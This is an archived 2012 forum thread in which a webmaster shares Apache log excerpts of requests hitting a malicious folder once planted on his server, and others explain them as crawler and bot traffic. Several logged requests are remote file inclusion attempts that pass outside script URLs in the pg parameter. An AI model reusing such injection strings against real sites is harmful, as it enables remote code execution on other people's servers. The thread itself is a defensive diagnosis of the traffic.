Shoutbox

Some assistance with Apache log excerpts - Printable Version

-Shoutbox (https://shoutbox.menthix.net)
+-- Forum: MsgHelp Archive (/forumdisplay.php?fid=58)
+--- Forum: Skype & Technology (/forumdisplay.php?fid=9)
+---- Forum: Tech Talk (/forumdisplay.php?fid=17)
+----- Thread: Some assistance with Apache log excerpts (/showthread.php?tid=99576)

Some assistance with Apache log excerpts by MeEtc on 08-28-2012 at 09:19 PM

code:
157.55.48.122 - - [08/Jun/2012:17:42:44 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2757 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
187.40.24.226 - - [18/Jun/2012:17:05:03 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/NewDir/opa.txt? HTTP/1.1" 404 2716 "-" "Mozilla/3.0 (compatible; Indy Library)"
157.55.109.246 - - [20/Jun/2012:07:51:12 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2764 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
200.243.30.2 - - [22/Jun/2012:16:05:18 -0400] "GET /euhsd/show.php?pg=http://www.uniaogaucha.org/images/galeria/ab2k1/upx.txt? HTTP/1.1" 404 2653 "-" "-"
186.194.6.158 - - [24/Jun/2012:10:23:14 -0400] "GET /euhsd/show.php?pg=http://euribors.com/send.txt? HTTP/1.1" 404 2678 "-" "Mozilla/3.0 (compatible; Indy Library)"
95.132.186.112 - - [27/Jun/2012:16:03:14 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:15 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
95.132.186.112 - - [27/Jun/2012:16:03:17 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 3006 "http://extrabot.com/help/tratygajiruboha.htm" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0"
157.55.48.122 - - [06/Jul/2012:05:56:07 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2726 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.55.109.245 - - [08/Jul/2012:04:14:05 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
78.158.11.226 - - [12/Jul/2012:09:30:07 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.0" 404 2857 "http://sameid.net/domain/yetanothersig.com/" "Lynx/2.8.5rel.1 libwww-FM/2.14FC SSL-MM/1.4.1b OpenSSL/0.9.7d-dev"
157.55.109.245 - - [13/Jul/2012:19:44:22 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [22/Jul/2012:08:22:11 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
157.56.93.231 - - [25/Jul/2012:08:16:53 -0400] "GET /euhsd/show.php?pg=650642650642 HTTP/1.1" 404 2763 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.226 - - [26/Jul/2012:08:58:55 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
157.56.93.218 - - [26/Jul/2012:19:54:45 -0400] "GET /euhsd/show.php?pg=897130897130 HTTP/1.1" 404 2761 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
199.187.122.90 - - [27/Jul/2012:22:11:03 -0400] "GET /euhsd/show.php?pg=344465344465 HTTP/1.1" 404 2727 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
189.48.123.38 - - [03/Aug/2012:12:44:44 -0400] "GET /euhsd/show.php?pg=http://wikiteca.iesb.br/wikiteca/newdir/opa.txt?&&r=s& HTTP/1.1" 404 2643 "-" "-"
94.23.225.68 - - [05/Aug/2012:19:19:03 -0400] "GET /euhsd/show.php?pg=782070782070 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.220.161 - - [06/Aug/2012:16:05:55 -0400] "GET /euhsd/show.php?pg=853806853806 HTTP/1.1" 404 2612 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"
94.23.225.68 - - [19/Aug/2012:00:04:21 -0400] "GET /euhsd/show.php?pg=594585594585 HTTP/1.1" 404 2642 "-" "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0"

the folder /euhsd/ was a malicious folder of files placed on my webserver a few years back when I got a virus that copied my FTP password. I have noticed that it still tries to get a lot of attention. I only looked through 3 months of logs, but I could go back more if needed. Is it possible to help track down what the source of this is? And no, I did not keep a copy of the files that were in the folder.
RE: Some assistance with Apache log excerpts by Menthix on 08-28-2012 at 09:38 PM

Well, it is still listed in Google, and possibly others: https://encrypted.google.com/search?q=inurl%3A%2Feuhsd%2Fshow.php

Those hitting it are probably individuals/bots/botnets who look for signs of infected sites on search engines and try to get in your server. But since everything 404s you shouldn't have anything to worry about.

Some bots (quite a lot actually) also just try common malware paths on random sites BTW. If you try a massive load a day you'll get lucky sooner or later :p.

EDIT:
All those 157.* ones are legit Microsoft IPs BTW, MSN/Bing bots trying to index your site.
(it kinda annoys me how long and often search engines keep hammering 404 URLs these days... in the same kind of situation with a site of mine and google)


RE: Some assistance with Apache log excerpts by MeEtc on 08-28-2012 at 10:45 PM

one of the get params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. rather interesting contents.


RE: Some assistance with Apache log excerpts by blessedguy on 08-28-2012 at 11:44 PM

quote:
Originally posted by MeEtc
one of the get params is the URL http://wikiteca.iesb.br/wikiteca/newdir/opa.txt. rather interesting contents.
Replying! ops!!!